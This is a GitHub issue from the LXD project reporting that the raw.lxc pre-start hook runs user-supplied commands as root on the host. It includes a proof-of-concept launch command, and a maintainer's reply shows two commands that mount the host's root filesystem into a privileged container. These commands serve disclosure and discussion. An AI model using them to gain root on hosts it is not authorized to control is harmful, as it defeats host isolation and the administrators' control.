Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

User can use lxc hooks for privilege escalation on lxd host #2003

simpoir opened this issue May 7, 2016 · 1 comment

User can use lxc hooks for privilege escalation on lxd host #2003

simpoir opened this issue May 7, 2016 · 1 comment


Copy link

@simpoir simpoir commented May 7, 2016

  • Distribution: Ubuntu 16.04
  • Kernel version: 4.4.0-21-generic
  • LXD version: 2.0.0
  • Storage backend in use: ZFS

LXD does not filter out or deny user to set lxc pre-start hook in user containers, which could be used to execute code as root on the host, outside the containers. Other hooks either run as subuid or in the contained environment so I see no direct issue with them, but pre-start run as a privileged user and could be used for privilege escalation.

joeuser@desktop:~$ lxc launch images:ubuntu/trusty/amd64 runme -c raw.lxc="lxc.hook.pre-start=sh -c 'echo foo >/runme'"
Creating runme
Starting runme
joeuser@laptop:~$ ls -l /runme 
-rw-r--r-- 1 root root 5 May  7 10:29 /runme
Copy link

@stgraber stgraber commented May 7, 2016

I thought we had it blocked but apparently had to unblock it for some reason (nova-lxd maybe) and even have a test to make sure it does run...

We may end up blocking it again at some point down the line as we generally don't guarantee anything about raw.lxc.

That being said, I don't think it's a security issue as we consider anyone having access to the LXD API to have full root access anyway.

Basically the following is always possible and will give you similar access:
lxc init ubuntu:16.04 blah -c security.privileged=true
lxc config device add blah root disk source=/ path=/mnt/root recursive=true

At which point you have the whole host mounted in /mnt/root and you have root access against all of it.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Linked pull requests

Successfully merging a pull request may close this issue.

None yet
2 participants